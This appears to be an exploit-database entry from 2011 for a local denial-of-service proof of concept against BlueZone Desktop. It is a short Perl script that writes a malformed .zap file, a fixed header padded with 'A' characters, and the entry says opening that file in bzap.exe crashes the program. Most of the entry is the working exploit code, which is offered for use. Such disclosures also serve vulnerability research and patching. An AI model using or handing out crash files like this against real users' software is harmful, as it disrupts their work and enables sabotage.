[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : BlueZone Desktop .zap file Local Denial of Service Vulnerability
# Published : 2011-10-15
# Author :
# Previous Title : Cytel Studio <= 9.0.0 Multiple Vulnerabilities
# Next Title : GMER 1.0.15.15641 MFT Overwrite
# Exploit Title: BlueZone Desktop Malformed .zap file Local Denial of Service
# Date: 10-15-11
# Author: Silent Dream
# Software Link: http://www.rocketsoftware.com/bluezone/downloads/desktop-free-trial
# Version: Latest
# Tested on: Windows XP SP3
#To trigger: Run this script, double click file to open with bzap.exe, program dies.
my $file = "bluepwn.zap";
my $head = "BZAP200BK";
my $junk = "A" x 20;
open($File, ">$file");
print $File $head.$junk;
close($FILE);